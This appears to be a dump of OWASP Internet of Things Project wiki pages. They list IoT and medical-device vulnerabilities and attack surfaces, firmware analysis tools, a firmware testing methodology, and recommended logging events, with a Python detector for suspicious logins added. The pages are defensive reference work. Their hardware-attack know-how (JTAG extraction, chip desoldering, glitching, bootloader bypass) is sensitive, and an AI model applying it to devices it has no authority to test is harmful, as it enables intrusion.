<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, one can obtain full console access to the device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and information security professionals to conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit vulnerabilities identified in previous stages to attain root and/or code execution<br />
|}<br />
The full methodology release can be downloaded via the following link: TBD.<br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology? ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
* Attack walkthroughs<br />
* Tool usage examples<br />
* Screenshots<br />
* Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki><br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
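Four of the events above as detection logic run over constructed device log lines (an added example, not code from the OWASP project): Multiple Failed Passwords, High Rate of Login Attempts, Device Accessed Using Default Administrative Credentials, and Source Location Changes During Session. The log format, the thresholds and the sliding window are assumptions, as is the `default=yes` marker that the device's login handler is assumed to write.<br />
<br />
```python
"""Detection logic for four of the recommended IoT logging events listed above.
Constructed (assumed) device log format, one record per line:
  <ISO-8601 UTC ts> auth result=<ok|fail> user=<name> src=<ip> sid=<session id> [default=yes]
  <ISO-8601 UTC ts> request sid=<session id> src=<ip> path=<url path>
default=yes is assumed to be logged when the accepted credentials matched factory defaults."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>auth|request)\s+(?P<kv>.*)$")
# Assumed thresholds; the Account Lockout entry on this page mentions 3 - 5 failed attempts.
FAILED_PASSWORD_THRESHOLD = 3   # failed passwords for one user inside WINDOW
HIGH_RATE_THRESHOLD = 10        # login attempts (any outcome) from one source inside WINDOW
WINDOW = timedelta(seconds=60)

def parse_line(line):
    """Parse one log record into a dict, or return None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = dict(pair.split("=", 1) for pair in m.group("kv").split() if "=" in pair)
    rec["kind"] = m.group("kind")
    rec["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return rec

class IoTEventDetector:
    """Stateful detector: feed records in time order and collect events in self.events."""

    def __init__(self):
        self.fail_times = defaultdict(deque)     # user -> timestamps of failed passwords
        self.attempt_times = defaultdict(deque)  # src -> timestamps of login attempts
        self.session_src = {}                    # sid -> source that established the session
        self.flagged_sessions = set()            # sids already reported for a source change
        self.events = []

    @staticmethod
    def _push(times, now):
        """Record a timestamp, drop those outside the sliding window, return the count."""
        times.append(now)
        while times and now - times[0] > WINDOW:
            times.popleft()
        return len(times)

    def _emit(self, category, event, rec, **details):
        self.events.append({"category": category, "event": event,
                            "ts": rec["ts"].isoformat(), **details})

    def feed(self, line):
        rec = parse_line(line)
        if rec is None:
            return
        now = rec["ts"]
        if rec["kind"] == "auth":
            # == rather than >= so that each event fires once, when the threshold is crossed
            if self._push(self.attempt_times[rec["src"]], now) == HIGH_RATE_THRESHOLD:
                self._emit("Authentication Exceptions", "High Rate of Login Attempts",
                           rec, src=rec["src"], attempts=HIGH_RATE_THRESHOLD)
            if rec["result"] == "fail":
                if self._push(self.fail_times[rec["user"]], now) == FAILED_PASSWORD_THRESHOLD:
                    self._emit("Authentication Exceptions", "Multiple Failed Passwords",
                               rec, user=rec["user"], failures=FAILED_PASSWORD_THRESHOLD)
            else:
                if rec.get("default") == "yes":
                    self._emit("Administrative Mode Events",
                               "Device Accessed Using Default Administrative Credentials",
                               rec, user=rec["user"], src=rec["src"])
                self.session_src[rec["sid"]] = rec["src"]  # session established from this source
        elif rec["kind"] == "request":
            origin = self.session_src.get(rec["sid"])
            if origin is not None and origin != rec["src"] and rec["sid"] not in self.flagged_sessions:
                self.flagged_sessions.add(rec["sid"])
                self._emit("Session Exceptions", "Source Location Changes During Session",
                           rec, sid=rec["sid"], from_src=origin, to_src=rec["src"])

def detect(lines):
    """Run the detector over an iterable of log lines and return the emitted events."""
    det = IoTEventDetector()
    for line in lines:
        det.feed(line)
    return det.events

def sample_lines():
    """Constructed sample log (RFC 5737 documentation addresses), in time order."""
    lines = [
        "2024-01-01T15:00:01Z auth result=fail user=admin src=192.0.2.10 sid=-",
        "2024-01-01T15:00:05Z auth result=fail user=admin src=192.0.2.10 sid=-",
        "2024-01-01T15:00:09Z auth result=fail user=admin src=192.0.2.10 sid=-",
        "2024-01-01T15:00:20Z auth result=ok user=admin src=192.0.2.10 sid=s1 default=yes",
        "2024-01-01T15:00:30Z request sid=s1 src=192.0.2.10 path=/status",
        "2024-01-01T15:00:45Z request sid=s1 src=198.51.100.7 path=/admin/config",
    ]
    # Ten attempts in ten seconds from one source, each against a different username.
    lines += [f"2024-01-01T15:01:{i:02d}Z auth result=fail user=user{i} src=203.0.113.5 sid=-"
              for i in range(10)]
    return lines

if __name__ == "__main__":
    for ev in detect(sample_lines()):
        print(ev)
```
<br />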
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general log far too few events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255833OWASP Internet of Things Project2019-10-31T15:03:27Z<p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
